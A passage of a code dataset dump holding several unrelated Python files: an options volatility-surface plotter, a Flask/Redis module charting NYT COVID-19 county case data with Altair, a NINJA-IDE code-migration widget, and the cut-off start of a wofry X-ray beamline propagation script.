put_strike_price.append(strike_price[b:b + len_i])\n put_vega.append(vega[b:b + len_i])\n put_theta.append(theta[b:b + len_i])\n put_gamma.append(gamma[b:b + len_i])\n put_delta.append(delta[b:b + len_i])\n b += len_i\n return call_strike_price, [call_delta, call_gamma, call_theta, call_vega, call_implied_volatility], \\\n put_strike_price, [put_delta, put_gamma, put_theta, put_vega, put_implied_volatility]\n\n\ndef knockout_small_value(x, y):\n length = len(x)\n new_x = [x[i] for i in range(length) if y[i] > 0.01]\n new_y = [i for i in y if i > 0.01]\n return new_x, new_y\n\n\ndef fit(call_x, call_y, put_x, put_y):\n xx = set()\n for i in call_x:\n xx |= set(i)\n xx = sorted(xx)\n call_y2, put_y2 = [], []\n for i in range(len(call_x)):\n if xx == call_x[i]:\n call_y2.append(call_y[i])\n else:\n new_x, new_y = knockout_small_value(call_x[i], call_y[i])\n tmp = polyval(polyfit(new_x, new_y, 2), xx)\n tmp[tmp < 0.0] = 0.0\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in call_x[i]:\n tmp_y.append(call_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(tmp[index])\n call_y2.append(tmp_y)\n if xx == put_x[i]:\n put_y2.append(put_y[i])\n else:\n new_x, new_y = knockout_small_value(put_x[i], put_y[i])\n tmp = polyval(polyfit(new_x, new_y, 2), xx)\n tmp[tmp < 0.0] = 0.0\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in put_x[i]:\n tmp_y.append(put_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(tmp[index])\n put_y2.append(tmp_y)\n return xx, call_y2, put_y2\n\n\ndef not_fit(call_x, call_y, put_x, put_y):\n xx = set()\n for i in call_x:\n xx |= set(i)\n xx = sorted(xx)\n call_y2, put_y2 = [], []\n for i in range(len(call_x)):\n if xx == call_x[i]:\n call_y2.append(call_y[i])\n else:\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in call_x[i]:\n tmp_y.append(call_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(nan)\n call_y2.append(tmp_y)\n if xx == put_x[i]:\n put_y2.append(put_y[i])\n else:\n tmp_y, index_y = [], 0\n for index, j in enumerate(xx):\n if j in put_x[i]:\n tmp_y.append(put_y[i][index_y])\n index_y += 1\n else:\n tmp_y.append(nan)\n put_y2.append(tmp_y)\n return xx, call_y2, put_y2\n\n\ndef update(call_codes, put_codes, all_codes, x, y, yy, surf_call, surf_put, ax_iv_sf_call, ax_iv_sf_put, is_fit):\n azim = AZIM\n while True:\n # sleep(5) # 每隔5秒刷新一次\n sleep(10)\n with update_picture_lock:\n call_x, call_ys, put_x, put_ys = get_data(call_codes, put_codes, all_codes)\n if is_fit:\n xx, call_y2, put_y2 = fit(call_x, call_ys[-1], put_x, put_ys[-1])\n else:\n xx, call_y2, put_y2 = not_fit(call_x, call_ys[-1], put_x, put_ys[-1])\n surf_call.remove()\n azim += 15\n if azim > 360:\n azim -= 360\n ax_iv_sf_call.view_init(ELEV, azim)\n # surf_call = ax_iv_sf_call.plot_surface(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_call = ax_iv_sf_call.plot_wireframe(x, y, array(call_y2), rstride=1, cstride=1)\n surf_put.remove()\n ax_iv_sf_put.view_init(ELEV, azim)\n # surf_put = ax_iv_sf_put.plot_surface(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_put = ax_iv_sf_put.plot_wireframe(x, y, array(put_y2), rstride=1, cstride=1)\n for index in range(5):\n for i in yy:\n global_ax_lines_call[index]['ax'].lines.remove(global_ax_lines_call[index]['lines'][i])\n global_ax_lines_put[index]['ax'].lines.remove(global_ax_lines_put[index]['lines'][i])\n global_ax_lines_call[index]['lines'] = []\n global_ax_lines_put[index]['lines'] = []\n for index in range(5):\n for i in yy:\n 
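# redraw one curve per expiry date so each keeps its fixed legend color\n                    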
global_ax_lines_call[index]['lines'].append(global_ax_lines_call[index]['ax'].plot(call_x[i], array(call_ys[index][i]), COLORS[i])[0])\n global_ax_lines_put[index]['lines'].append(global_ax_lines_put[index]['ax'].plot(put_x[i], array(put_ys[index][i]), COLORS[i])[0])\n plt.draw()\n\n\ndef main(cate, exchange, underlying, dividend=True, is_fit=True):\n call_codes, put_codes, all_codes, dates = get_codes(cate, exchange, underlying, dividend)\n dates_label = ',,'.join(dates).split(',')\n call_x, call_ys, put_x, put_ys = get_data(call_codes, put_codes, all_codes)\n if is_fit:\n xx, call_y2, put_y2 = fit(call_x, call_ys[-1], put_x, put_ys[-1])\n else:\n xx, call_y2, put_y2 = not_fit(call_x, call_ys[-1], put_x, put_ys[-1])\n yy = list(range(len(call_y2)))\n x, y = meshgrid(xx, yy)\n fig = plt.figure(figsize=(12, 5.7))\n fig.canvas.mpl_connect('button_press_event', lambda event: update_picture_lock.acquire())\n fig.canvas.mpl_connect('button_release_event', lambda event: update_picture_lock.release())\n gs = gridspec.GridSpec(3, 6, figure=fig)\n ylabels = ['Delta', 'Gamma', 'Theta', 'Vega', 'Implied Volatility']\n call_gs = [gs[2:3, :1], gs[2:3, 1:2], gs[2:3, 2:3], gs[1:2, 2:3], gs[:1, 2:3]]\n put_gs = [gs[2:3, 3:4], gs[2:3, 4:5], gs[2:3, 5:6], gs[1:2, 5:6], gs[:1, 5:6]]\n # ---------------------------------------------------------------------------------------------------\n for index in range(5):\n call_ax = fig.add_subplot(call_gs[index])\n for i in yy:\n line, = call_ax.plot(call_x[i], call_ys[index][i], COLORS[i])\n global_ax_lines_call[index]['lines'].append(line)\n call_ax.set_xlabel('Strike Price')\n call_ax.set_ylabel(ylabels[index])\n call_ax.legend(dates, fontsize='xx-small')\n global_ax_lines_call[index]['ax'] = call_ax\n put_ax = fig.add_subplot(put_gs[index])\n for i in yy:\n line, = put_ax.plot(put_x[i], put_ys[index][i], COLORS[i])\n global_ax_lines_put[index]['lines'].append(line)\n put_ax.set_xlabel('Strike Price')\n put_ax.set_ylabel(ylabels[index])\n put_ax.legend(dates, fontsize='xx-small')\n global_ax_lines_put[index]['ax'] = put_ax\n ax_iv_sf_call = fig.add_subplot(gs[:2, :2], projection='3d')\n ax_iv_sf_call.view_init(ELEV, AZIM)\n # surf_call = ax_iv_sf_call.plot_surface(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n # print(x.shape, y.shape, array(call_y2).shape)\n surf_call = ax_iv_sf_call.plot_wireframe(x, y, array(call_y2), rstride=1, cstride=1, cmap='rainbow')\n ax_iv_sf_call.set_yticklabels(dates_label)\n ax_iv_sf_call.set_xlabel('Strike Price')\n ax_iv_sf_call.set_ylabel('Expiration Date')\n ax_iv_sf_call.set_zlabel('Implied Volatility')\n ax_iv_sf_call.set_title('Call Option')\n ax_iv_sf_put = fig.add_subplot(gs[:2, 3:5], projection='3d')\n ax_iv_sf_put.view_init(ELEV, AZIM)\n # surf_put = ax_iv_sf_put.plot_surface(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n surf_put = ax_iv_sf_put.plot_wireframe(x, y, array(put_y2), rstride=1, cstride=1, cmap='rainbow')\n ax_iv_sf_put.set_yticklabels(dates_label)\n ax_iv_sf_put.set_xlabel('Strike Price')\n ax_iv_sf_put.set_ylabel('Expiration Date')\n ax_iv_sf_put.set_zlabel('Implied Volatility')\n ax_iv_sf_put.set_title('Put Option')\n plt.tight_layout()\n thread = Thread(target=update, args=(call_codes, put_codes, all_codes, x, y, yy, surf_call, surf_put, ax_iv_sf_call, ax_iv_sf_put, is_fit))\n thread.setDaemon(True)\n thread.start()\n plt.show()\n\n\nif __name__ == '__main__':\n category = '50ETF'\n underlying_security = '510050'\n # category = '300ETF'\n # underlying_security = '510300'\n 
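# dividend=False skips the dividend-adjusted ('A') contracts and is_fit=True fills sparse strikes via the quadratic fit in fit()\n    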
main(cate=category, exchange='null', underlying=underlying_security, dividend=False, is_fit=True)\n","repo_name":"sfl666/option_tools","sub_path":"volatility_surface.py","file_name":"volatility_surface.py","file_ext":"py","file_size_in_byte":12115,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"40"} +{"seq_id":"14898428735","text":"import altair as alt\nimport pandas as pd\nimport numpy as np\nfrom datetime import date\nfrom os import path\nfrom flask import current_app as app\nimport redis, requests, time, pyarrow\n\ndef connect():\n return redis.Redis( host=app.config['REDIS_HOST'], port=app.config['REDIS_PORT'] )\n\ndef fetchData(rconn):\n context = pyarrow.default_serialization_context()\n\n #\n # Check date of main dataframe\n #\n expires = rconn.hget(\"county\",\"expires\")\n if expires and time.time() < float(expires):\n return context.deserialize(rconn.hget(\"county\",\"dataframe\"))\n\n #\n # Fetch new copy\n #\n dt = pd.read_csv(\"https://github.com/nytimes/covid-19-data/blob/master/us-counties.csv?raw=true\")\n dt['dt'] = pd.to_datetime(dt.date,format=\"%Y-%m-%d\")\n\n #\n # Save\n #\n rconn.hset(\"county\",\"dataframe\",context.serialize(dt).to_buffer().to_pybytes())\n rconn.hset(\"county\",\"expires\",str(time.time()+600.0))\n return dt\n\ndef fetchNames(rconn):\n context = pyarrow.default_serialization_context()\n\n if rconn.hexists(\"county\",\"names\"):\n return context.deserialize(rconn.hget(\"county\",\"names\"))\n\n dt = fetchData(rconn)\n counties = dt.filter(items=(\"state\",\"county\")).drop_duplicates()\n\n rconn.hset(\"county\",\"names\",context.serialize(counties).to_buffer().to_pybytes())\n return counties\n\ndef fetchCounty(rconn,state,county):\n context = pyarrow.default_serialization_context()\n\n #\n # Check date of main dataframe\n #\n key = state + \":\" + county \n key_expires = key + \":expires\"\n\n expires = rconn.hget(\"county\", key_expires)\n if expires and time.time() < float(expires):\n return context.deserialize(rconn.hget(\"county\",key))\n\n #\n # Fetch new master data frame\n #\n dt = fetchData(rconn)\n\n #\n # Process and save\n #\n answer = dt[(dt.state==state) & (dt.county==county)].copy()\n answer['days'] = (answer.dt-min(answer.dt[answer.cases>0])).dt.days\n answer['days10'] = (answer.dt-min(answer.dt[answer.cases>9])).dt.days\n answer = answer.sort_values(by=\"days\")\n answer['ddeaths'] = answer.deaths.diff()\n answer['dcases'] = answer.cases.diff()\n\n states = pd.read_csv(path.join(app.config['DATA_DIR'],\"state-abbre.csv\"))\n abbrev = states[states['State']==state]['Code']\n answer['stcode'] = abbrev.iloc[0] if len(abbrev) > 0 else \"?\"\n\n rconn.hset(\"county\",key,context.serialize(answer).to_buffer().to_pybytes())\n rconn.hset(\"county\",key_expires,str(time.time()+600.0))\n return answer\n\ndef fetchPopulationAll(rconn):\n context = pyarrow.default_serialization_context()\n\n #\n # See if we have this cached\n #\n key = 'population'\n serialized = rconn.hget(\"county\",key)\n if serialized:\n return context.deserialize(serialized)\n\n #\n # Process and save\n #\n answer = pd.read_csv(path.join(app.config['DATA_DIR'],\"co-est2019-alldata.csv\"), encoding='Windows-1252')\n answer = answer.filter(items=['CTYNAME','STNAME','POPESTIMATE2019'])\n rconn.hset(\"county\",key,context.serialize(answer).to_buffer().to_pybytes())\n \n return answer\n\ndef fetchPopulation(rconn,state,county):\n all = fetchPopulationAll(rconn)\n\n answer = all[(all['CTYNAME'] == county+\" County\") & 
(all['STNAME'] == state)]\n if len(answer) == 1:\n return answer['POPESTIMATE2019'].values[0]\n\n #\n # Remove incompatible suffixes\n #\n if county.endswith(\" City\"):\n answer = all[(all['CTYNAME'] == county[:-5]+\" County\") & (all['STNAME'] == state)]\n if len(answer) == 1:\n return answer['POPESTIMATE2019'].values[0]\n\n print(f\"County population not found: '{county}' '{state}'\")\n return None\n\ndef california_county_populations(rconn):\n context = pyarrow.default_serialization_context()\n\n if rconn.hexists(\"county\",\"capop\"):\n return context.deserialize(rconn.hget(\"county\",\"capop\"))\n\n # from https://www.california-demographics.com/counties_by_population\n raw = \"\"\"\n1\tLos Angeles County\t10,098,052\n2\tSan Diego County\t3,302,833\n3\tOrange County\t3,164,182\n4\tRiverside County\t2,383,286\n5\tSan Bernardino County\t2,135,413\n6\tSanta Clara County\t1,922,200\n7\tAlameda County\t1,643,700\n8\tSacramento County\t1,510,023\n9\tContra Costa County\t1,133,247\n10\tFresno County\t978,130\n11\tKern County\t883,053\n12\tSan Francisco County\t870,044\n13\tVentura County\t848,112\n14\tSan Mateo County\t765,935\n15\tSan Joaquin County\t732,212\n16\tStanislaus County\t539,301\n17\tSonoma County\t501,317\n18\tTulare County\t460,477\n19\tSanta Barbara County\t443,738\n20\tSolano County\t438,530\n21\tMonterey County\t433,212\n22\tPlacer County\t380,077\n23\tSan Luis Obispo County\t281,455\n24\tSanta Cruz County\t273,765\n25\tMerced County\t269,075\n26\tMarin County\t260,295\n27\tButte County\t227,075\n28\tYolo County\t214,977\n29\tEl Dorado County\t186,661\n30\tImperial County\t180,216\n31\tShasta County\t179,085\n32\tMadera County\t155,013\n33\tKings County\t150,075\n34\tNapa County\t140,530\n35\tHumboldt County\t135,768\n36\tNevada County\t99,092\n37\tSutter County\t95,872\n38\tMendocino County\t87,422\n39\tYuba County\t75,493\n40\tLake County\t64,148\n41\tTehama County\t63,373\n42\tSan Benito County\t59,416\n43\tTuolumne County\t53,932\n44\tCalaveras County\t45,235\n45\tSiskiyou County\t43,540\n46\tAmador County\t37,829\n47\tLassen County\t31,185\n48\tGlenn County\t27,897\n49\tDel Norte County\t27,424\n50\tColusa County\t21,464\n51\tPlumas County\t18,699\n52\tInyo County\t18,085\n53\tMariposa County\t17,540\n54\tMono County\t14,174\n55\tTrinity County\t12,862\n56\tModoc County\t8,938\n57\tSierra County\t2,930\n58\tAlpine County\t1,146\n\"\"\"\n\n import io\n raw = raw.replace(\" County\",\"\").replace(\",\",\"\")\n ca_pop = pd.read_csv(io.StringIO(raw),sep=\"\\t\",header=None,names=(\"rank\",\"county\",\"pop\"))\n\n rconn.hset(\"county\",\"capop\",context.serialize(ca_pop).to_buffer().to_pybytes())\n return ca_pop\n\n\ndef menu():\n r = connect()\n counties = fetchNames(r)\n names = counties.apply(lambda r: '{}, {}'.format(r.county,r.state), axis=1)\n\n return {\n 'names': names.sort_values(),\n 'default': \"Santa Clara, California\",\n 'default2': \"Harris, Texas\"\n }\n\n#\n# We'll allow the axis to float a little negative, but\n# not too far, otherwise it can get ugly. 
Fall down to the next unit \n# value, for small statistics.\n#\ndef not_too_negative(quantity,control):\n return [\n max(quantity.min(),-np.ceil(0.05*quantity.max())), \n min(quantity.max(),1.5*control.max())\n ]\n\n#\n# Similar, but for stats per capita, we have continuous\n# values\n#\ndef not_too_negative_continuous(quantity,control):\n return [\n max(quantity.min(),-0.05*quantity.max()), \n min(quantity.max(),1.5*control.max())\n ]\n\ndef simple_plot(code, time):\n r = connect()\n\n parts = code.split(\", \")\n fc = fetchCounty( r, parts[1], parts[0] )\n\n fc['proll'] = fc.dcases.rolling(window=7).mean()\n fc['froll'] = fc.ddeaths.rolling(window=7).mean()\n\n fc = fc[fc.dt >= pd.to_datetime(date(2020,3,1))].filter(\n items=(\"dt\",\"dcases\",\"ddeaths\",\"proll\",\"froll\")\n )\n\n fc['src1'] = \"Daily\"\n fc['src2'] = \"7 day\"\n\n if time > 0:\n fc = fc[fc.dt > pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")]\n\n chart = alt.Chart(fc)\n\n fake_scale = alt.Scale(domain=('Daily','7 day'), range=('lightgrey','blue'))\n\n case_points = chart.mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\",title=\"Date\"),\n y = alt.Y(\n \"dcases:Q\",\n title = \"Cases\",\n scale = alt.Scale(domain=not_too_negative(fc.dcases,fc.proll))\n ),\n color = alt.Color(\"src1\", scale=fake_scale)\n )\n case_average = chart.mark_line(clip=True).encode(\n x = alt.X('dt:T'),\n y = alt.Y('proll:Q'),\n color = alt.Color(\"src2\", scale=fake_scale)\n )\n\n death_points = chart.mark_line(\n point = {\"color\": \"lightgrey\"}, \n color = \"lightgrey\",\n clip = True\n ).encode(\n x = alt.X(\"dt:T\", title=\"Date\"),\n y = alt.Y(\n \"ddeaths:Q\",\n title = \"Fatalities\",\n scale = alt.Scale(domain=not_too_negative(fc.ddeaths,fc.froll))\n ),\n )\n death_average = chart.mark_line(clip=True).encode(\n x = alt.X('dt:T'),\n y = alt.Y('froll:Q')\n )\n\n top = (case_points + case_average).properties(\n width = 500, \n height = 200,\n title = code\n )\n bot = (death_points + death_average).properties(\n width = 500, \n height = 200\n )\n\n return (top & bot).configure_legend(title=None).to_dict()\n\ndef both(time):\n r = connect()\n\n if time > 0:\n dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n else:\n dt_start = pd.to_datetime(date(2020,3,1))\n\n def fetchHere( r, state, county ):\n answer = fetchCounty( r, state, county )\n answer['name'] = answer['county'] + \", \" + answer['stcode']\n answer['droll'] = answer.dcases.rolling(window=7).mean()\n return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"dcases\",\"droll\",\"name\"))\n\n sa = fetchHere( r, \"Oregon\", \"Marion\" )\n cc = fetchHere( r, \"Massachusetts\", \"Barnstable\" )\n pl = fetchHere( r, \"Oregon\", \"Multnomah\" )\n ha = fetchHere( r, \"Texas\", \"Harris\" )\n\n dt_top = pd.concat((sa,cc,pl))\n\n selection = alt.selection_multi(fields=['name'], bind='legend', empty='none')\n scale = alt.Scale(domain=[dt_start,sa.dt.max()])\n\n top_points = alt.Chart(dt_top).mark_line(point=True, clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\n \"dcases:Q\", \n title = \"Daily cases, 7 day rolling average\",\n scale = alt.Scale(domain=not_too_negative(dt_top.droll,dt_top.droll))\n ),\n color = alt.Color(\"name:N\"),\n opacity = alt.condition(selection, alt.value(1), alt.value(0))\n )\n\n top_lines = alt.Chart(dt_top).mark_line(clip=True).encode(\n x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n y = alt.Y(\"droll:Q\"),\n color = alt.Color(\"name:N\")\n )\n \n top = (top_points + 
top_lines).properties(width=500, height=200)\n\n    bot_points = alt.Chart(ha).mark_line(point=True, clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n        y = alt.Y(\n            \"dcases:Q\", \n            title = \"Daily cases, 7 day rolling average\",\n            scale = alt.Scale(domain=not_too_negative(ha.droll,ha.droll))\n        ),\n        color = alt.Color(\"name:N\"),\n        opacity = alt.condition(selection, alt.value(1), alt.value(0))\n    )\n\n    bot_lines = alt.Chart(ha).mark_line(clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n        y = alt.Y(\"droll:Q\"),\n        color = alt.Color(\"name:N\")\n    )\n    \n    bot = (bot_points + bot_lines).properties(width=500, height=200)\n\n    return (top & bot).add_selection(selection).configure_legend(title=None).to_dict()\n\n\ndef silicon_valley(time):\n    r = connect()\n\n    if time > 0:\n        dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n    else:\n        dt_start = pd.to_datetime(date(2020,3,1))\n\n    def fetchHere( r, state, county ):\n        answer = fetchCounty( r, state, county )\n        answer['name'] = answer['county'] + \", \" + answer['stcode']\n        answer['droll'] = answer.dcases.rolling(window=7).mean()\n        return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"dcases\",\"droll\",\"name\"))\n\n    dt = pd.concat((\n        fetchHere( r, \"California\", \"Santa Clara\" ),\n        fetchHere( r, \"California\", \"Alameda\" )\n    ))\n    chart = alt.Chart(dt)\n\n    selection = alt.selection_multi(fields=['name'], bind='legend', empty='none')\n    scale = alt.Scale(domain=[dt_start,dt.dt.max()])\n\n    points = chart.mark_line(point=True, clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n        y = alt.Y(\n            \"dcases:Q\", \n            title = \"Daily cases, 7 day rolling average\",\n            scale = alt.Scale(domain=not_too_negative(dt.droll,dt.droll))\n        ),\n        color = alt.Color(\"name:N\"),\n        opacity = alt.condition(selection, alt.value(1), alt.value(0))\n    )\n\n    lines = chart.mark_line(clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n        y = alt.Y(\"droll:Q\"),\n        color = alt.Color(\"name:N\")\n    )\n    \n    plot = (points+lines).properties(width=500, height=300)\n\n    return plot.add_selection(selection).configure_legend(title=None).to_dict()\n\n\n\ndef compare_plot(code1, code2, time):\n    r = connect()\n\n    if time > 0:\n        dt_start = pd.Timestamp.today() - pd.Timedelta(time,unit=\"d\")\n    else:\n        dt_start = pd.to_datetime(date(2020,3,1))\n\n    def fetchHere( r, code ):\n        parts = code.split(\", \")\n        pop = fetchPopulation(r, parts[1], parts[0])\n        if pop is None: return None\n        answer = fetchCounty(r, parts[1], parts[0])\n        answer['name'] = answer['county'] + \", \" + answer['stcode']\n        answer['croll'] = answer.dcases.rolling(window=7).mean()*100000/pop\n        answer['droll'] = answer.ddeaths.rolling(window=7).mean()*100000/pop\n        return answer[answer.dt >= dt_start].filter(items=(\"dt\",\"croll\",\"droll\",\"name\"))\n\n    dt = pd.concat((\n        fetchHere( r, code1 ),\n        fetchHere( r, code2 ),\n    ))\n    chart = alt.Chart(dt)\n\n    selection = alt.selection_multi(fields=['name'], bind='legend')\n    scale = alt.Scale(domain=[dt_start,dt.dt.max()])\n\n    top = chart.mark_line(clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", scale=scale),\n        y = alt.Y(\n            \"croll:Q\", \n            title = \"Cases per 100,000, 7 day rolling average\",\n            scale = alt.Scale(domain=not_too_negative_continuous(dt.croll,dt.croll))\n        ),\n        color = alt.Color(\"name:N\"),\n        opacity = alt.condition(selection, alt.value(1), alt.value(0.2))\n    ).properties(width=500, height=200)\n\n    bot = chart.mark_line(clip=True).encode(\n        x = alt.X(\"dt:T\", title=\"Date\", 
scale=scale),\n        y = alt.Y(\n            \"droll:Q\", \n            title = \"Fatalities per 100,000, 7 day rolling average\",\n            scale = alt.Scale(domain=not_too_negative_continuous(dt.droll,dt.droll))\n        ),\n        color = alt.Color(\"name:N\"),\n        opacity = alt.condition(selection, alt.value(1), alt.value(0.2))\n    ).properties(width=500, height=200)\n\n    return (top & bot).add_selection(selection).configure_legend(title=None).to_dict()\n\n\ndef california_bar(percapital=False):\n    r = connect()\n    dt = fetchData(r)\n    dtca = dt[dt.state==\"California\"].groupby(\"county\").apply(\n        lambda a: max(a.sort_values(by=\"dt\").cases.diff()[-7:].sum(),0)\n    ).reset_index()\n    dtca = dtca.rename(columns={0:\"case7\"})\n\n    if percapital:\n        pop = california_county_populations(r)\n        dtca = dtca.merge(pop,on=\"county\")\n        dtca['cf7'] = 100000*dtca.case7/dtca['pop']\n        answer = alt.Chart(dtca).mark_bar().encode(\n            x = alt.X('cf7:Q', title=\"New cases per 100,000, last 7 days\"),\n            y = alt.Y('county:N', title=\"County\")\n        )\n    else:\n        answer = alt.Chart(dtca).mark_bar().encode(\n            x = alt.X('case7:Q', title=\"New cases, last 7 days\"),\n            y = alt.Y('county:N', title=\"County\")\n        )\n\n    return answer.properties(width=300, height=600).to_dict()\n\n\ndef harris_vs_santa_clara(time):\n    return compare_plot( 'Santa Clara, California', 'Harris, Texas', time)\n","repo_name":"dwilliams-github/covidweb","sub_path":"server/drivers/county.py","file_name":"county.py","file_ext":"py","file_size_in_byte":15266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72988652601","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of NINJA-IDE (http://ninja-ide.org).\n#\n# NINJA-IDE is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# any later version.\n#\n# NINJA-IDE is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with NINJA-IDE; If not, see .\nfrom __future__ import absolute_import\n\nfrom PyQt4.QtGui import QWidget\nfrom PyQt4.QtGui import QListWidget\nfrom PyQt4.QtGui import QListWidgetItem\nfrom PyQt4.QtGui import QLabel\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QVBoxLayout\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QSpacerItem\nfrom PyQt4.QtGui import QSizePolicy\nfrom PyQt4.QtGui import QPlainTextEdit\nfrom PyQt4.QtGui import QTextCursor\nfrom PyQt4.QtCore import Qt\nfrom PyQt4.QtCore import SIGNAL\n\nfrom ninja_ide.gui.main_panel import main_container\n\n\nclass MigrationWidget(QWidget):\n\n def __init__(self):\n super(MigrationWidget, self).__init__()\n self._migration = {}\n vbox = QVBoxLayout(self)\n lbl_title = QLabel(self.tr(\"Current code:\"))\n self.current_list = QListWidget()\n lbl_suggestion = QLabel(self.tr(\"Suggested changes:\"))\n self.suggestion = QPlainTextEdit()\n self.suggestion.setReadOnly(True)\n\n self.btn_apply = QPushButton(self.tr(\"Apply change!\"))\n hbox = QHBoxLayout()\n hbox.addSpacerItem(QSpacerItem(1, 0, QSizePolicy.Expanding))\n hbox.addWidget(self.btn_apply)\n\n vbox.addWidget(lbl_title)\n vbox.addWidget(self.current_list)\n vbox.addWidget(lbl_suggestion)\n vbox.addWidget(self.suggestion)\n vbox.addLayout(hbox)\n\n self.connect(self.current_list,\n SIGNAL(\"itemClicked(QListWidgetItem*)\"), self.load_suggestion)\n self.connect(self.btn_apply, SIGNAL(\"clicked()\"), self.apply_changes)\n\n def apply_changes(self):\n lineno = int(self.current_list.currentItem().data(Qt.UserRole))\n lines = self._migration.migration_data[lineno][0].split('\\n')\n remove = -1\n code = ''\n for line in lines:\n if line.startswith('-'):\n remove += 1\n elif line.startswith('+'):\n code += '%s\\n' % line[1:]\n\n editorWidget = main_container.MainContainer().get_actual_editor()\n block_start = editorWidget.document().findBlockByLineNumber(lineno)\n block_end = editorWidget.document().findBlockByLineNumber(\n lineno + remove)\n cursor = editorWidget.textCursor()\n cursor.setPosition(block_start.position())\n cursor.setPosition(block_end.position(), QTextCursor.KeepAnchor)\n cursor.movePosition(QTextCursor.EndOfLine, QTextCursor.KeepAnchor)\n cursor.insertText(code[:-1])\n\n def load_suggestion(self, item):\n lineno = int(item.data(Qt.UserRole))\n lines = self._migration.migration_data[lineno][0].split('\\n')\n code = ''\n for line in lines:\n if line.startswith('+'):\n code += '%s\\n' % line[1:]\n self.suggestion.setPlainText(code)\n editorWidget = main_container.MainContainer().get_actual_editor()\n if editorWidget:\n editorWidget.jump_to_line(lineno)\n editorWidget.setFocus()\n\n def refresh_lists(self, migration):\n self._migration = migration\n self.current_list.clear()\n base_lineno = -1\n for lineno in sorted(migration.migration_data.keys()):\n linenostr = 'L%s\\n' % str(lineno + 1)\n data = migration.migration_data[lineno]\n lines = data[0].split('\\n')\n if base_lineno == data[1]:\n continue\n base_lineno = data[1]\n message = ''\n for line in lines:\n if line.startswith('-'):\n message += '%s\\n' % line\n item = QListWidgetItem(linenostr + message)\n item.setToolTip(linenostr + message)\n item.setData(Qt.UserRole, lineno)\n self.current_list.addItem(item)\n\n def clear(self):\n \"\"\"\n Clear the widget\n \"\"\"\n self.current_list.clear()\n 
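# wipe the suggestion preview too, so no stale diff text lingers\n        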
self.suggestion.clear()\n","repo_name":"AlexaProjects/Alexa2","sub_path":"ALEXA-IDE/core/ninja_ide/gui/explorer/migration_lists.py","file_name":"migration_lists.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"12189491128","text":"#\n# runs using \"WofrySuperBeamline\" with wofry wavefronts\n#\n\n\nfrom orangecontrib.comsyl.util.CompactAFReader import CompactAFReader\n# from CompactAFReader import CompactAFReader\n\nimport numpy\n\n\nfrom srxraylib.plot.gol import plot_image, plot\n\nfrom wofry.propagator.propagators2D.fresnel_zoom_xy import FresnelZoomXY2D\nfrom wofry.propagator.propagator import PropagationManager\n\n\nfrom wofry.propagator.propagator import PropagationElements, PropagationParameters\nfrom syned.beamline.beamline_element import BeamlineElement\nfrom syned.beamline.element_coordinates import ElementCoordinates\nfrom wofry.beamline.optical_elements.ideal_elements.screen import WOScreen\nfrom wofry.beamline.optical_elements.ideal_elements.lens import WOIdealLens\nfrom wofry.beamline.optical_elements.absorbers.slit import WOSlit\n\nfrom wofry.propagator.wavefront2D.generic_wavefront import GenericWavefront2D\n\nfrom syned.beamline.shape import Rectangle\n\nclass WofrySuperBeamline(object):\n def __init__(self):\n self._beamline_elements = []\n self._propagator_handlers = []\n self._propagator_specific_parameteres = []\n\n self._initialize_propagator()\n\n def add_element(self,\n beamline_element=BeamlineElement(),\n propagator_handler=\"FRESNEL_ZOOM_XY_2D\",\n propagator_specific_parameters={'shift_half_pixel':1,'magnification_x':1.0,'magnification_y':1.0},\n ):\n self._beamline_elements.append(beamline_element)\n self._propagator_handlers.append(propagator_handler)\n self._propagator_specific_parameteres.append(propagator_specific_parameters)\n\n\n def number_of_elements(self):\n return len(self._beamline_elements)\n\n def _initialize_propagator(self):\n\n self._propagator = PropagationManager.Instance()\n try:\n self._propagator.add_propagator(FresnelZoomXY2D())\n except:\n print(\"May be you alreay initialized propagator and stored FresnelZoomXY2D\")\n\n def _info(self):\n\n for i in range(self.number_of_elements()):\n print(\">>>\",self._beamline_elements[i])\n\n def propagate(self,wofry_wavefront):\n\n w_out = wofry_wavefront.duplicate()\n output_wavefronts = []\n\n for i in range(self.number_of_elements()):\n w_in = w_out.duplicate()\n\n #\n # propagating\n #\n #\n propagation_elements = PropagationElements()\n propagation_elements.add_beamline_element(self._beamline_elements[i])\n\n propagation_parameters = 